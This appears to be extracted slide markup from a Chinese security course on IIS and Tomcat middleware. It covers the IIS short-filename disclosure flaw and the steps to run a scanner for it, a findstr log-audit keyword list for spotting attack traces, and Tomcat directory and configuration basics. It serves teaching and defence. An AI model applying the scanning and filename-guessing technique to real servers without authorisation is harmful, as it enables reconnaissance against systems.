                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>这标志着成功上传了文</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>件</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
              <a:cs typeface="Noto Sans CJK JP Regular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80347" y="3811270"/>
            <a:ext cx="3312160" cy="284480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3312159" h="284479">
                <a:moveTo>
                  <a:pt x="0" y="284479"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3311652" y="284479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="331165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3526790" cy="284480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3526790" h="284479">
                <a:moveTo>
                  <a:pt x="0" y="284479"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3526536" y="284479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="352653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851" y="1470723"/>
            <a:ext cx="9195435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3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IIS6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存 在 的 短 文 件 名 漏 洞 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2012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年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7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月 ， 由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Soroush Dalili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发 现 ） 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https://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  <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/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6535" y="3797808"/>
            <a:ext cx="5354320" cy="1201420"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5354320" h="1201420">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5353812" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5353812" y="1200912"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="12009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2116" y="3793210"/>
            <a:ext cx="5363845" cy="1210310"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5363845" h="1210310">
                <a:moveTo>
                  <a:pt x="5358650" y="1209852"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="1209852"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3301" y="1209611"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1968" y="1208938"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="914" y="1207884"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241" y="1206563"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1205090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5358650" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="536341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00327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="1200327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="1205090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5363413" y="1205090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5363171" y="1206563"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5362498" y="1207884"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5361444" y="1208938"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5360123" y="1209611"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5358650" y="1209852"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5363845" h="12103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363845" h="1210310">
                <a:moveTo>
                  <a:pt x="535388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353888" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5353888" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5363845" h="1210310">
                <a:moveTo>
                  <a:pt x="5353888" y="1205090"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5353888" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5358650" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5363413" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5363413" y="1200327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5358650" y="1200327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5353888" y="1205090"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5363845" h="1210310">
                <a:moveTo>
                  <a:pt x="5363413" y="9525"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5358650" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5353888" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5363413" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5363413" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5363845" h="1210310">
                <a:moveTo>
                  <a:pt x="9525" y="1205090"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="1200327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="1200327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="1205090"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5363845" h="1210310">
                <a:moveTo>
                  <a:pt x="5353888" y="1205090"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9525" y="1205090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="1200327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5353888" y="1200327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5353888" y="1205090"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5363845" h="1210310">
                <a:moveTo>
                  <a:pt x="5363413" y="1205090"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5353888" y="1205090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5358650" y="1200327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5363413" y="1200327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5363413" y="1205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2254891"/>
            <a:ext cx="10833100" cy="268795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背景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windows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的短文件名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latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>支持的长文件名最多</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>为</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="9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255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个字</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>符</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
              <a:cs typeface="Noto Sans CJK JP Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="755650" marR="5080" indent="-28575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latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>为了兼容性，以允许基</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>于</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="8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MS-DOS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或</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="8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16 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>位</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="8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Windows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的程序访问这些文件，可以用短文件名</a:t>
            </a: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latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>字符</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>+3</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>个后缀</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>）  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>进行访</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>问</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
              <a:cs typeface="Noto Sans CJK JP Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="2978150">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1245"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>例如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spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Windows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从长文件名</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
              <a:cs typeface="Noto Sans CJK JP Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="2978150">
              <a:lnSpc>
                <a:spcPts val="2155"/>
              </a:lnSpc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This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is a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really long</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="18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filename.123.456.789.txt</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="2978150">
              <a:lnSpc>
                <a:spcPts val="2155"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>生成短文件名</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
              <a:cs typeface="Noto Sans CJK JP Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="2978150">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="10"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="5346700" algn="l"/>
              </a:tabLst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Thisis~1.txt	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" b="1" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>8.3</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="10" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>格式的文件</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>名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0" y="1597722"/>
            <a:ext cx="46941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利用</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="944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~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”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字符猜解暴露短文件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文件夹名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51" y="1853570"/>
            <a:ext cx="7049770" cy="294576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短文件漏洞安全扫描工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具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使用方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法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1.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编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译</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="16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/scanner_directory/javac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scanner.java</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="2016760" algn="ctr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2.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运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行</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="16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/scanner_directory/java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scanner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视频（需翻墙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Video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Link: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2"/>
              </a:rPr>
              <a:t>http://www.youtube.com/watch?v=XOd90yCXOP4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需要安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装</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="16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JDK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or 7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以编译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件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811530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3"/>
              </a:rPr>
              <a:t>http://www.oracle.com/technetwork/java/javase/downloads/index.html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60108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II</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>服务器日志审计方法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597723"/>
            <a:ext cx="293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IIS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服务器的日志查看工具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8711" y="1865376"/>
            <a:ext cx="9054084" cy="2964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4555" y="5666232"/>
            <a:ext cx="5259705" cy="368935"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5259705" h="368935">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5259324" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5259324" y="368808"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="36880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0238" y="5661659"/>
            <a:ext cx="5267960" cy="379095"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5267959" h="379095">
                <a:moveTo>
                  <a:pt x="5263057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68" y="377951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="914" y="376897"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241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5263057" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52678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5267820" y="374091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5267591" y="375564"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5266918" y="376897"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5265864" y="377951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5264531" y="378625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5263057" y="378853"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5267959" h="37909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267959" h="379095">
                <a:moveTo>
                  <a:pt x="52582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258295" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5258295" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5267959" h="379095">
                <a:moveTo>
                  <a:pt x="5258295" y="374091"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5258295" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5263057" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5267820" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5267820" y="369328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5263057" y="369328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5258295" y="374091"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5267959" h="379095">
                <a:moveTo>
                  <a:pt x="5267820" y="9525"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5263057" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5258295" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5267820" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5267820" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5267959" h="379095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5267959" h="379095">
                <a:moveTo>
                  <a:pt x="5258295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5258295" y="369328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5258295" y="374091"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5267959" h="379095">
                <a:moveTo>
                  <a:pt x="5267820" y="374091"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5258295" y="374091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5263057" y="369328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5267820" y="369328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5267820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5209603"/>
            <a:ext cx="7544434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使用命令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findstr "cmd"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d:\wwwroot\w3c\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日志文件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.log</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="2376170">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1605"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" b="1" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>cmd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dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>'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spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>\\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spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>..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dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>;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spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>and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spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>webconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="10" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" b="1" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>global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914400" y="1795953"/>
            <a:ext cx="10287000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是一个开源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服务器，基于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运行效率高，可以在一般的硬件平台上流畅运行，属于轻量级应用服务器，在中小型系统和并发访问用户不是很多的场合下被普遍使用，是开发和调试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JSP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程序的首选。因此，颇受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站长的青睐。</a:t>
            </a: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233690" y="460108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kern="0" spc="-5">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>Tomcat</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
              <a:cs typeface="Noto Sans CJK JP Regular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3655DB1C-BEF1-FF49-B584-97DB97D6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7" y="3276600"/>
            <a:ext cx="4206004" cy="2024385"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="https://camo.qiitausercontent.com/79e890884670a72f4fddd511ca7fa571f2ee2fd7/68747470733a2f2f71696974612d696d6167652d73746f72652e73332e616d617a6f6e6177732e636f6d2f302f39393639362f39383531333838342d323433332d333162642d373531302d343162363264353866363564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1981200" cy="34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98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742" y="1414378"/>
            <a:ext cx="101805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>
                <a:solidFill>
                  <a:srgbClr val="EF7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	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根目录下有</a:t>
            </a:r>
            <a:r>
              <a:rPr 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bin,conf,lib,logs,temp,webapps,work 7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个文件夹，以及一些文件：</a:t>
            </a:r>
            <a:b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</a:b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914400" y="1795953"/>
            <a:ext cx="10287000" cy="505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：该目录下存放的是二进制可执行文件，如果是安装版，那么这个目录下会有两个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tomcat6.exe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tomcat6w.exe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，前者是在控制台下启动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，后者是弹出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UGI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窗口启动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；如果是解压版，那么会有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startup.bat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shutdown.bat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conf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：这是一个非常非常重要的目录，这个目录下有四个最为重要的文件：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server.xml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：配置整个服务器信息。例如修改端口号，添加虚拟主机等；下面会详细介绍这个文件；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tomcatusers.xml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：存储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用户的文件，这里保存的是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的用户名及密码，以及用户的角色信息。可以按着该文件中的注释信息添加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用户，然后就可以在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主页中进入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 Manager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页面了；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web.xml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：部署描述符文件，这个文件中注册了很多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类型，即文档类型。这些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类型是客户端与服务器之间说明文档类型的，如用户请求一个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网页，那么服务器还会告诉客户端浏览器响应的文档是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text/html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类型的，这就是一个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类型。客户端浏览器通过这个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类型就知道如何处理它了。当然是在浏览器中显示这个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文件了。但如果服务器响应的是一个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文件，那么浏览器就不可能显示它，而是应该弹出下载窗口才对。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MIME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就是用来说明文档的内容是什么类型的！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context.xml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：对所有应用的统一配置，通常我们不会去配置它。</a:t>
            </a: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233690" y="460108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kern="0" spc="-5">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>Tomcat</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" kern="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4962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742" y="1414378"/>
            <a:ext cx="101805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>
                <a:solidFill>
                  <a:srgbClr val="EF7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	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根目录下有</a:t>
            </a:r>
            <a:r>
              <a:rPr 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bin,conf,lib,logs,temp,webapps,work 7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个文件夹，以及一些文件：</a:t>
            </a:r>
            <a:b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</a:b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914400" y="1795953"/>
            <a:ext cx="10287000" cy="272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lib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的类库，里面是一大堆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文件。如果需要添加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文件，可以把它放到这个目录中，当然也可以把应用依赖的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文件放到这个目录中，这个目录中的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所有项目都可以共享之，但这样你的应用放到其他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下时就不能再共享这个目录下的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包了，所以建议只把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需要的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包放到这个目录下；</a:t>
            </a:r>
          </a:p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logs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：这个目录中都是日志文件，记录了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启动和关闭的信息，如果启动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时有错误，那么异常也会记录在日志文件中。</a:t>
            </a:r>
          </a:p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temp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：存放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的临时文件，这个目录下的东西可以在停止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后删除！</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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233690" y="460108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kern="0" spc="-5">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>Tomcat</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" kern="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9329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742" y="1414378"/>
            <a:ext cx="101805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>
                <a:solidFill>
                  <a:srgbClr val="EF7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	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根目录下有</a:t>
            </a:r>
            <a:r>
              <a:rPr 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bin,conf,lib,logs,temp,webapps,work 7</a:t>
            </a:r>
            <a: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个文件夹，以及一些文件：</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" spc="23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</a:br>
            <a:endParaRPr sz="18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914400" y="1795953"/>
            <a:ext cx="10287000" cy="272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webapps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：存放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项目的目录，其中每个文件夹都是一个项目；如果这个目录下已经存在了目录，那么都是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自带的。项目。其中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是一个特殊的项目，在地址栏中没有给出项目目录时，对应的就是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http://localhost:8080/examples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，进入示例项目。其中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就是项目名，即文件夹的名字。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="12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 work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：运行时生成的文件，最终运行的文件都在这里。通过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webapps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中的项目生成的！可以把这个目录下的内容删除，再次运行时会生再次生成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目录。当客户端用户访问一个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文件时，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会通过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文件，然后再编译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文件生成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文件，生成的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文件都会存放到这个目录下。</a:t>
            </a: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233690" y="460108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2DED1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kern="0" spc="-5">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>Tomcat</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" kern="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675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/>
              <a:t>前置知识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EC82BB-9410-8C46-9B81-D55D92610EFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1116914" y="19264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主要知识点：</a:t>
            </a:r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7"/>
            <a:ext cx="50552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介绍常见</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-Hans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了解中间件常见的安全问题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了解中间件安全防护的基本思想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54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>
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-70" dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>服务器的安全设置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5600128"/>
            <a:ext cx="628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查看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/etc/tomcat/tomcat.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="4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文件，获得安装目录等信息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8280" y="2235707"/>
            <a:ext cx="7157084" cy="370840"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7157084" h="370839">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7156704" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="715670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3403" y="2231288"/>
            <a:ext cx="7166609" cy="379095"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7166609" h="379094">
                <a:moveTo>
                  <a:pt x="7161314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68" y="377939"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="914" y="376885"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241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7166076" y="374091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7165835" y="375564"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7165162" y="376885"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7164108" y="377939"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7162787" y="378625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7161314" y="378853"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7166609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379094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379094">
                <a:moveTo>
                  <a:pt x="7156551" y="374091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369328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7161314" y="369328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7156551" y="374091"/>
                </a:lnTo>
